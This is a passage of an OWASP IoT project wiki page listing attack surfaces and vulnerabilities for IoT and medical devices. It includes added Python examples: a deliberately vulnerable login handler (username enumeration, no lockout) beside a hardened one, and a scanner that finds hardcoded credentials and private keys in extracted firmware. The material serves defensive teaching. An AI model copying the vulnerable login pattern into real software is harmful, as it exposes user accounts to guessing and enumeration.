* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the attacks they are known to be exposed to (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key (shared across all devices)<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
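The credential-management items that recur across the table above (username enumeration, weak passwords, missing account lockout) are easiest to see side by side in code. The following is an added example, not code from the OWASP IoT project: a Python login handler in its enumerable, lockout-free form beside a hardened one. The thresholds (lock for 15 minutes after 5 consecutive failures), the tiny COMMON_PASSWORDS deny-list and the alice sample account are assumptions chosen for the demonstration.

```python
"""Login handling for a device, cloud or admin interface: an enumerable,
lockout-free version next to a hardened one. Added example, not OWASP code."""
import hashlib
import hmac
import secrets
import time

PBKDF2_ITERATIONS = 100_000
MAX_FAILURES = 5             # assumption: lock after 5 consecutive failures
LOCKOUT_SECONDS = 15 * 60    # assumption: temporary lock; a permanent one is a DoS lever
MIN_PASSWORD_LENGTH = 12
# Assumed tiny deny-list; a real deployment checks a large breached-password set.
COMMON_PASSWORDS = {"1234", "12345", "123456", "12345678", "password", "admin", "default"}


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt; returns (salt, digest)."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


def password_is_acceptable(password, username):
    """Reject the trivially guessable values that pre-programmed defaults tend to be."""
    lowered = password.lower()
    if len(password) < MIN_PASSWORD_LENGTH or lowered.isdigit():
        return False
    if lowered in COMMON_PASSWORDS or username.lower() in lowered:
        return False
    return True


class VulnerableLogin:
    """Distinct error messages reveal which usernames exist, and nothing limits guessing."""

    def __init__(self, users):
        self.users = users

    def login(self, username, password):
        if username not in self.users:
            return "unknown user"          # username enumeration oracle
        salt, expected = self.users[username]
        if hash_password(password, salt)[1] != expected:
            return "wrong password"        # second oracle, unlimited attempts
        return "ok"


class HardenedLogin:
    """One generic failure message, constant-time comparison, the same PBKDF2 cost
    for unknown names, and a temporary per-account lockout after MAX_FAILURES."""

    def __init__(self, users, clock=time.monotonic):
        self.users = users
        self.clock = clock                 # injectable so lockout expiry is testable
        self.failures = {}                 # username -> (consecutive failures, locked_until)
        self._decoy = hash_password(secrets.token_hex(16))  # hashed against for unknown names

    def is_locked(self, username):
        return self.clock() < self.failures.get(username, (0, 0.0))[1]

    def login(self, username, password):
        count, locked_until = self.failures.get(username, (0, 0.0))
        now = self.clock()
        if now < locked_until:
            return "invalid credentials"   # locked: same message as any other failure
        if locked_until:
            count = 0                      # an earlier lock has expired; fresh window
        salt, expected = self.users.get(username, self._decoy)
        actual = hash_password(password, salt)[1]
        if username in self.users and hmac.compare_digest(actual, expected):
            self.failures.pop(username, None)
            return "ok"
        count += 1
        locked_until = now + LOCKOUT_SECONDS if count >= MAX_FAILURES else 0.0
        self.failures[username] = (count, locked_until)
        return "invalid credentials"


# Constructed sample account store (one user; the password passes password_is_acceptable).
SAMPLE_USERS = {"alice": hash_password("correct horse battery staple")}
```

The decoy hash matters as much as the generic message: without it, an unknown username returns faster than a known one, and response time becomes the enumeration oracle instead of the text. The lock is deliberately temporary because an attacker who knows a username can otherwise lock the legitimate owner out indefinitely; pair it with per-source rate limiting, and bound the failures map (or key it by account only) so junk usernames cannot grow it without limit.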
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is misconfigured or not kept up to date, e.g. SSL v2 is still enabled<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies access to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading it from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a great deal of useful information: the binaries (and sometimes source code) of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb, the execution of the firmware on the device can be modified to bypass almost all software-based security controls.<br />
* Side-channel attacks such as glitching can likewise alter the execution flow, or be used to leak sensitive information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, an attacker can often obtain full console access to the device<br />
* The usual security measure is a custom bootloader that prevents the attacker from entering single-user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH daemons, web servers, etc.<br />
|-<br />
<br />
|}<br />
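The firmware rows above (extraction, sensitive data in firmware, insecure third-party components) and the Firmware Analysis Project's vulnerability list later on this page share one follow-up step: once the root filesystem is extracted, go through it systematically rather than by eye. The script below is an added example, not an OWASP tool. It builds its own fake rootfs in a temporary directory (fake password hashes, a fake key, fake ELF strings, all constructed for the demonstration) and then scans it; the file paths, regexes and finding categories are assumptions. The one external fact it encodes is that OpenSSL 1.0.1 through 1.0.1f are the Heartbleed-affected releases.

```python
"""Scan an extracted firmware root filesystem for hardcoded credentials, shipped
private keys, backdoor accounts and outdated components. Added example, not an
OWASP project tool; the sample rootfs it builds is entirely fake."""
import re
import tempfile
from pathlib import Path

MAX_FILE_BYTES = 32 * 1024 * 1024  # skip raw flash dumps and other huge blobs

PRIVATE_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")
# "password=..." / "secret: ..." assignments at line start, typical of shipped config files.
CRED_ASSIGN_RE = re.compile(rb"(?im)^\s*(passwd|password|pass|secret|api_key)\s*([=:])\s*(\S+)")
# Version banners that common embedded components carry in their binaries.
VERSION_RES = {
    "busybox": re.compile(rb"BusyBox v(\d+\.\d+\.\d+)"),
    "openssl": re.compile(rb"OpenSSL (\d+\.\d+\.\d+[a-z]?)"),
}
HEARTBLEED_RE = re.compile(r"^1\.0\.1[a-f]?$")  # OpenSSL 1.0.1 .. 1.0.1f (CVE-2014-0160)


def _check_passwd(rel, data, findings):
    """Any UID 0 account besides root is a root-equivalent login the vendor must justify."""
    for line in data.decode(errors="replace").splitlines():
        parts = line.split(":")
        if len(parts) >= 3 and parts[2] == "0" and parts[0] != "root":
            findings.append(("uid0-account", rel, parts[0]))


def _check_shadow(rel, data, findings):
    for line in data.decode(errors="replace").splitlines():
        parts = line.split(":")
        if len(parts) < 2:
            continue
        user, hash_field = parts[0], parts[1]
        if hash_field == "":
            findings.append(("empty-password", rel, user))  # login with no password at all
        elif not hash_field.startswith(("!", "*")):
            # A hash baked into a read-only rootfs is one credential shared by every unit.
            findings.append(("hardcoded-password-hash", rel, user))


def scan_rootfs(root):
    """Return (category, relative_path, detail) tuples for everything found under root."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if path.stat().st_size > MAX_FILE_BYTES:
            continue
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        if rel == "etc/passwd":
            _check_passwd(rel, data, findings)
        elif rel == "etc/shadow":
            _check_shadow(rel, data, findings)
        if PRIVATE_KEY_RE.search(data):
            findings.append(("private-key", rel, "PEM private key shipped in firmware"))
        for m in CRED_ASSIGN_RE.finditer(data):
            key, sep = m.group(1).decode(), m.group(2).decode()
            findings.append(("credential-in-config", rel, f"{key}{sep}<redacted>"))
        for name, regex in VERSION_RES.items():
            m = regex.search(data)
            if m:
                version = m.group(1).decode()
                findings.append(("component-version", rel, f"{name} {version}"))
                if name == "openssl" and HEARTBLEED_RE.match(version):
                    findings.append(("heartbleed-range", rel, f"openssl {version}"))
    return findings


def summarize(findings):
    counts = {}
    for category, _, _ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts


def build_sample_rootfs(root):
    """Write a constructed, deliberately weak mini rootfs (fake hashes, fake key, fake ELF)."""
    root = Path(root)
    files = {
        "etc/passwd": "root:x:0:0:root:/root:/bin/sh\nadmin:x:0:0:support:/:/bin/sh\n"
                      "nobody:x:65534:65534:nobody:/:/bin/false\n",
        "etc/shadow": "root:$1$FAKESALT$fakehashfakehashfakeh:17000:0:99999:7:::\n"
                      "admin::17000:0:99999:7:::\nnobody:*:17000:0:99999:7:::\n",
        "etc/config/wifi.conf": "ssid=IoTCam\npassword=Summer2015\n",
        "etc/ssl/device.key": "-----BEGIN RSA PRIVATE KEY-----\nMIIEfakefakefake\n-----END RSA PRIVATE KEY-----\n",
        "usr/bin/busybox": "\x7fELF...BusyBox v1.19.4 (2013-05-07 10:00:00 UTC) multi-call binary...",
        "usr/lib/libssl.so.1.0.0": "\x7fELF...OpenSSL 1.0.1e 11 Feb 2013...",
    }
    for rel, content in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    return root


def demo():
    """Build the fake rootfs in a temp dir, scan it and return per-category counts."""
    with tempfile.TemporaryDirectory() as tmp:
        return summarize(scan_rootfs(build_sample_rootfs(tmp)))
```

After extracting the filesystem from the image (with the Firmware Modification Kit linked on this page, binwalk, or a chip-off dump), point scan_rootfs at the extracted directory. A password hash or private key found this way deserves more than a line in a report: the user usually cannot change either on a read-only rootfs, so one cracked hash or one copied key opens every unit that ships the same image. Version strings only flag components for a CVE lookup; they do not prove exploitability, since vendors sometimes backport fixes without bumping the banner.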
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key (shared across all devices)<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to understand the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
